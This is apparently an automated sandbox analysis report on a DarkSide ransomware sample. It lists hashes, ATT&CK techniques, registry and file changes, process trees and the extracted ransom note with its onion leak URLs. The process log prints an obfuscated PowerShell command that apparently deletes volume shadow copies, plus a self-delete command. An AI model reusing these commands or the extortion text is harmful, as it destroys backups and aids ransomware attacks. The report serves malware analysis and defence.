darkside | 4dcb5d42f6a37cb000de14de346978fa3a9f6a8cd4e41aaec3a15534cc726a1d

Analysis

max time kernel
196s
max time network
206s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
02-06-2023 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Darkside.exe
Size

59KB
MD5

cfcfb68901ffe513e9f0d76b17d02f96
SHA1

766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f
SHA256

17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61
SHA512

0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c
SSDEEP

768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Score

10^/10

darkside persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\README.99c97067.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (155) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

Darkside.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\RegisterConvertTo.tiff	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitShow.tiff	Darkside.exe
File renamed	C:\Users\Admin\Pictures\SubmitShow.tiff => C:\Users\Admin\Pictures\SubmitShow.tiff.99c97067	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\SubmitShow.tiff.99c97067	Darkside.exe
File renamed	C:\Users\Admin\Pictures\TracePush.tiff => C:\Users\Admin\Pictures\TracePush.tiff.99c97067	Darkside.exe
File renamed	C:\Users\Admin\Pictures\RegisterConvertTo.tiff => C:\Users\Admin\Pictures\RegisterConvertTo.tiff.99c97067	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterConvertTo.tiff.99c97067	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\TracePush.tiff	Darkside.exe
File opened for modification	C:\Users\Admin\Pictures\TracePush.tiff.99c97067	Darkside.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\99c97067.BMP"	Darkside.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\99c97067.BMP"	Darkside.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Darkside.exe

pid process

3772 Darkside.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3772	Darkside.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

Darkside.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000\Control Panel\Desktop\WallpaperStyle = "10"	Darkside.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133301887935538405"	chrome.exe

Modifies registry class 6 IoCs

Processes:

Darkside.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.99c97067	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.99c97067\ = "99c97067"	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\99c97067\DefaultIcon	Darkside.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\99c97067	Darkside.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\99c97067\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\99c97067.ico"	Darkside.exe
Key created	\REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1676 NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exeDarkside.exechrome.exe

pid process

4472 powershell.exe
4472 powershell.exe
4472 powershell.exe
3772 Darkside.exe
3772 Darkside.exe
456 chrome.exe
456 chrome.exe

pid	process
1676	NOTEPAD.EXE

pid	process
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
3772	Darkside.exe
3772	Darkside.exe
456	chrome.exe
456	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

chrome.exe

pid	process
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Darkside.exepowershell.exevssvc.exechrome.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3772	Darkside.exe
Token: SeSecurityPrivilege	3772	Darkside.exe
Token: SeTakeOwnershipPrivilege	3772	Darkside.exe
Token: SeLoadDriverPrivilege	3772	Darkside.exe
Token: SeSystemProfilePrivilege	3772	Darkside.exe
Token: SeSystemtimePrivilege	3772	Darkside.exe
Token: SeProfSingleProcessPrivilege	3772	Darkside.exe
Token: SeIncBasePriorityPrivilege	3772	Darkside.exe
Token: SeCreatePagefilePrivilege	3772	Darkside.exe
Token: SeBackupPrivilege	3772	Darkside.exe
Token: SeRestorePrivilege	3772	Darkside.exe
Token: SeShutdownPrivilege	3772	Darkside.exe
Token: SeDebugPrivilege	3772	Darkside.exe
Token: SeSystemEnvironmentPrivilege	3772	Darkside.exe
Token: SeRemoteShutdownPrivilege	3772	Darkside.exe
Token: SeUndockPrivilege	3772	Darkside.exe
Token: SeManageVolumePrivilege	3772	Darkside.exe
Token: 33	3772	Darkside.exe
Token: 34	3772	Darkside.exe
Token: 35	3772	Darkside.exe
Token: 36	3772	Darkside.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeBackupPrivilege	1376	vssvc.exe
Token: SeRestorePrivilege	1376	vssvc.exe
Token: SeAuditPrivilege	1376	vssvc.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe
Token: SeCreatePagefilePrivilege	456	chrome.exe
Token: SeShutdownPrivilege	456	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe
456	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OpenWith.exe

pid process

3324 OpenWith.exe

pid	process
3324	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Darkside.exechrome.exe

description	pid	process	target process
PID 3772 wrote to memory of 4472	3772	Darkside.exe	powershell.exe
PID 3772 wrote to memory of 4472	3772	Darkside.exe	powershell.exe
PID 3772 wrote to memory of 3476	3772	Darkside.exe	cmd.exe
PID 3772 wrote to memory of 3476	3772	Darkside.exe	cmd.exe
PID 3772 wrote to memory of 3476	3772	Darkside.exe	cmd.exe
PID 456 wrote to memory of 944	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 944	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5076	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5056	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 5056	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe
PID 456 wrote to memory of 2600	456	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
2⤵
PID:3476

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1376

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3324

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.99c97067.TXT
1⤵
- Opens file in notepad (likely ransom note)
PID:1676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffcb7af9758,0x7ffcb7af9768,0x7ffcb7af9778
2⤵
PID:944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:5056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1492 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:2
2⤵
PID:5076

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1664 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:2600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:4084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:3344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3584 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4536 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:3372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4732 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:2188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:2688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:4728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4900 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:4012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4760 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4884 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:3644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3316 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:4496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3116 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:3124

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3052 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:4164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3888 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4528 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:1
2⤵
PID:1072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1660 --field-trial-handle=1748,i,5036914792877549963,6923532763142310061,131072 /prefetch:8
2⤵
PID:1528

C:\Program Files\Google\Chrome\Application\chrome.exe
